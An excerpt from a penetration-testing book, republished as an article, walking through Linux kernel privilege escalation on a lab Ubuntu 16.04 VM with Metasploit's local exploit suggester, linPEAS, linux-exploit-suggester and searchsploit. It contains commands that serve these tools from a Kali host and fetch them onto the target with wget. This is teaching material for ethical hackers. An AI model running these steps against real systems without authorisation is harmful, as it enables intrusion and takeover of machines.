How to conduct Linux privilege escalations

Learn how to conduct Linux kernel exploitation with Metasploit and manually, as well as how to identify vulnerabilities on Linux using enumeration scripts.

When it comes to privilege escalation attacks, the conversation is often focused on Windows. But privilege escalation in Linux should not be overlooked due to its widespread usage. Nearly 38% of websites use Linux, and many companies use Linux alongside Windows.

Windows and Linux are the two systems penetration testers are most likely to encounter during engagements, author and security researcher Alexis Ahmed said, so knowing how to conduct privilege escalation on each is paramount.

Ahmed wrote Privilege Escalation Techniques to teach pen testers and ethical hackers different privilege escalation techniques for Windows and Linux devices. One Linux privilege escalation technique he detailed in the book is kernel exploitation. Linux user space has restricted permissions, while kernel space has more privileges, making it an attractive target to attackers.

In the following excerpt from Chapter 10 of Privilege Escalation Techniques, learn how to use Metasploit in a virtual environment to test existing Linux systems for kernel weaknesses. Ahmed provides manual and automated methods for pen testers to use. Download the entire chapter here to learn how to set up the testing environment and more.

Read an interview with Ahmed, where the experienced pen tester discusses who the book is for, common privilege escalation vulnerabilities and what companies can do to prevent successful attacks.

Kernel exploitation with Metasploit

We can begin the kernel exploitation process by taking a look at how to use kernel exploits with the Metasploit framework. The Metasploit framework offers an automated and modularized solution and streamlines the exploitation process.

For this section, our target system will be the Ubuntu 16.04 virtual machine. As a prerequisite, ensure that you have gained your initial foothold on the system and have a meterpreter session:

  1. The first step involves scanning the target for potential exploits. For this, we will be using the local_exploit_suggester module. This process was covered in depth in the previous chapter.
  2. We can load the module in Metasploit by running the following command:
    use post/multi/recon/local_exploit_suggester
  3. After loading the module, you will need to set the SESSION option for the module. The SESSION option requires the session ID of your meterpreter session. This can be done by running the following command:
    set SESSION <SESSION-ID>
    As illustrated in the following screenshot, the SESSION option should reflect the session ID you set:
    Screenshot of session options
    Figure 10.5 - local_exploit_suggester options
  4. After configuring the module options, we can run the module by running the following command:
    run
    This will begin the scanning process, during which the module will begin to output the various exploits that the target is potentially vulnerable to, as highlighted in the following screenshot:
    Screenshot of suggester results
    Figure 10.6 - local_exploit_suggester results
  5. Now, we can begin testing the various exploit modules recommended by local_ exploit_suggester. The first few modules in the output usually have a higher chance of working successfully. We can test the second module in the list, as highlighted in the preceding screenshot, by loading the module. This can be done by running the following command:
    use /exploit/linux/local/netfilter_priv_esc_ipv4
    This kernel exploit will exploit a netfilter bug on Linux kernels before version 4.6.3 and requires iptables to be enabled and loaded. The exploit also requires libc6-dev-i386 for compiling the exploit. More information regarding this exploit can be found here: https://www.rapid7.com/db/modules/exploit/linux/local/netfilter_priv_esc_ipv4/.
  6. After loading the module, you will need to set the module options, which will include the meterpreter session ID and the payload options for the new meterpreter session, as highlighted in the following screenshot:
    Screenshot of meterpreter session ID and payload options
    Figure 10.7 - Kernel exploit module options
  7. We can now run the kernel exploit module by running the following command:
    exploit
    In this case, the exploit was unsuccessful because libc6-dev-i386 is not installed, as seen in the following screenshot:
    Screenshot of unsuccessful exploit attempt
    Figure 10.8 - Metasploit kernel exploit failed

Alternatively, running the other kernel exploits suggested by local_exploit_ suggester will fail. This is an important lesson to learn: you cannot always rely on using automated Metasploit modules to gain access or elevate your privileges on the target system. Trial and error is a big part of the privilege escalation process.

Given that this path has not yielded any results, we will need to take a more manual hands-on approach in identifying the correct kernel exploit to use. Let's begin by taking a look at how to enumerate relevant information from the target system with various enumeration scripts.

Screenshot of Privilege Escalation Techniques book coverLearn more about Privilege
Escalation Techniques
here.

Manual kernel exploitation

In some cases, you will not be successful in using Metasploit modules to elevate your privileges, you may not have access to a target with a meterpreter session, or you may have exploited the target through a manual exploitation technique such as a web shell. In that case, you will have access through a standard reverse shell, most likely facilitated through netcat. This poses a few issues; how can you scan the target for potential kernel exploits? And how can you transfer over the kernel exploit to the target?

These are the issues we will be addressing in this section; our target of choice will be the Ubuntu 16.04 virtual machine we set up earlier in this chapter.

Local enumeration tools

The first step is to scan and identify potential kernel vulnerabilities. This can be done by using linux-exploit-suggester or other enumeration scripts and tools. In this case, we will utilize the linPEAS script to enumerate information from our target.

Note

linPEAS is a local Linux enumeration script that searches and scans for potential vulnerabilities, and then enumerates all important system information that can be used to stage a privilege escalation attack.

The linPEAS binary can be downloaded from the following GitHub repository: https://github.com/carlospolop/privilege-escalation-awesome- scripts-suite/tree/master/linPEAS.

Ensure you download the linpeas Bash script, as highlighted in the following screenshot:

Screenshot of Bash script files
Figure 10.9 - linPEAS Bash script

After downloading the Bash script to our Kali VM, we need to transfer the linpeas.sh file to our target virtual machine. This cannot be done automatically as we do not have a meterpreter session. As a result, we will need to make use of Linux-specific utilities to download the binary.

Transferring files

To transfer the linpeas.sh file to our target, we will need to set up a web server on our Kali VM. This will be used to host the file so that we can download it on the target system. This can be done by following these steps:

  1. To set up a web server on our Kali VM, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the linpeas.sh binary is stored:
    sudo python -m SimpleHTTPServer 80

    Note

    You can also use any other open port on your system if port 80 is being used.

    Alternatively, you can utilize the Python 3 http.server module by running the following command:
    sudo python3 -m http.server 80
    As highlighted in the following screenshot, SimpleHTTPServer will serve the files in the directory on the Kali VM IP address on port 80:
    Screenshop of Kali VM directory
    Figure 10.10 - SimpleHTTTPServer linpeas.sh
  2. To download the linpeas.sh file on to the target system, we can utilize the wget utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the temporary directory, as illustrated in the following screenshot:
    Screenshot of Linux temp directory
    Figure 10.11 - Linux temp directory
  3. We can now use the wget utility to download the file from the Kali VM onto our target system. This can be done by running the following command on the target system:
    wget http://<KALI-VM-IP>/linpeas.sh
    The output of the preceding command can be seen in the following screenshot:
    Screenshot of command wget successful transfer
    Figure 10.12 - wget successful transfer

As shown in the preceding screenshot, if the transfer is successful, the linpeas.sh file should be downloaded and saved with the name we specified.

We can now use the linpeas.sh script to enumerate important system information that we can use to elevate our privileges.

Enumerating system information

The linpeas.sh script enumerates a lot of information and will perform various checks to discover potential vulnerabilities on the target system. However, it does not enumerate a list of potential kernel exploits. In the context of kernel exploits, we can use the linpeas.sh script to enumerate system information such as the kernel version. This can be done by going through the following steps:

  1. To enumerate all the important system information, we need to run the linpeas.sh script. However, before we do that, we need to ensure the script has executable permissions. This can be done by running the following command on the target:
    chmod +x linpeas.sh
  2. We can now run the linpeas.sh script by running the following command on the target:
    ./linpeas.sh -o SysI
    The SysI option is used to restrict the results of the script to only system information. This is primarily because the linpeas.sh script will generate a lot of output.

    As shown in the following screenshot, the script will enumerate system information, the kernel version that's been installed, and the Linux distribution release version, as well as the codename:
    Screenshot of Linux distribution info
    Figure 10.13 - linPEAS system information

In this case, our target is running Ubuntu 16.04 LTS with kernel version 4.4.0-21 running. We can use this information to identify specific vulnerabilities that affect this version of the kernel. The distribution ID, release version, and codename are also important as some kernel exploits are designed to be run on specific Linux distributions.

The linPEAS script does not provide us with any potential kernel exploits that can be used to elevate our privileges. As a result, we will have to utilize other enumeration scripts.

Note

The linPEAS script enumerates a lot of useful information that will be very useful in the later stages of this book as we delve into other Linux privilege escalation techniques.

Enumerating kernel exploits

We can utilize linux-exploit-suggester to enumerate our system information and scan for potential kernel exploits. The linux-exploit-suggester script can be downloaded from https://github.com/mzet-/linux-exploit-suggester.

It is recommended that you download the script and rename it with a simpler filename. This can be automated by running the following command:

wget https://raw.githubusercontent.com/mzet-/linux-exploit
suggester/master/linux-exploit-suggester.sh -O les.s

After downloading the script, we will need to transfer it over to the target system. This can be done by following these steps:

  1. To set up a web server on our Kali VM, we can utilize the SimpleHTTPServer Python module to serve the binary file. This can be done by running the following command in the directory where the les.sh script is stored:
    sudo python -m SimpleHTTPServer 80
  2. To download the les.sh script on the target system, we can utilize the wget utility. Before we can download the binary, however, we need to navigate to a directory where we have read and write permissions. In this case, we will navigate to the temporary directory, as illustrated in the following screenshot:
    Screenshot of Linux temp directory
    Figure 10.14 - Linux temp directory

    We can now use the wget utility to download the file from the Kali VM to our target system. This can be done by running the following command on the target system:
    wget http://<KALI-VM-IP>/les.sh
    The output is shown in the following screenshot:
    Screenshot of command wget successful transfer
    Figure 10.15 - wget successful transfer
    As shown in the preceding screenshot, if the transfer is successful, the les.sh script should be downloaded and saved with the name we specified.
  3. We can now use the les.sh script to enumerate potential kernel vulnerabilities that we can use to elevate our privileges. This can be done by running the following command on the target system:
    ./les.sh
    As outlined in the following screenshot, the script will enumerate all potential kernel exploits that can be used to elevate privileges. We can now use this information to determine the correct kernel exploit to use:
    Screenshot of kernel exploit suggestions
    Figure 10.16 - Linux exploit suggester - kernel exploits
  4. It is always recommended to use the first exploit's output with the enumeration tools and scripts. In this case, we will start with the CVE-2016-4557 kernel exploit. We will need to determine more information about the exploit and how it should be used. We can do this by performing a quick Google search, as highlighted in the following screenshot:
    Screenshot of CVE-2016-4557 Google search
    Figure 10.17 - CVE-2016-4557 Google search
    The preceding Google search reveals an exploit-db reference that contains information regarding the exploit, the exploit's source code, and how it should be used.

    It is always recommended to analyze the source code to ensure that it is not malicious and works as intended. This allows you to make any additional modifications that are required.
  5. Alternatively, we can also use the exploit-db command-line utility to query for specific vulnerabilities. This can be done by running the following command in the Kali VM:
    searchsploit linux kernel 4.4
    In this case, we are querying the exploit-db database for exploits specific to Linux kernel version 4.4.0. As highlighted in the following screenshot, we can identify the same exploit:
    Screenshot of Linux Searchsploit results
    Figure 10.18 - Searchsploit results

Now that we have identified a potential kernel exploit, we can start transferring the exploit to the target and execute it.

Dig Deeper on Threat detection and response